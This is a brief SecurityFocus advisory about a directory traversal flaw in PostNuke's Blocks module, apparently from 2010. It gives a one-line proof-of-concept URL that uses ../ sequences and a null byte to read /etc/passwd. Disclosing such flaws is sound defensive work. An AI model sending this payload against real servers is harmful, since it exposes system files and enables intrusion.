PostNuke Blocks Module Directory Traversal Vulnerability

An exploit is not required.

The following proof of concept is available:

http://www.example.com/index.php?module=Blocks&type=lang&func=../../../../../../etc/passwd%00


 

Privacy Statement
Copyright 2010, SecurityFocus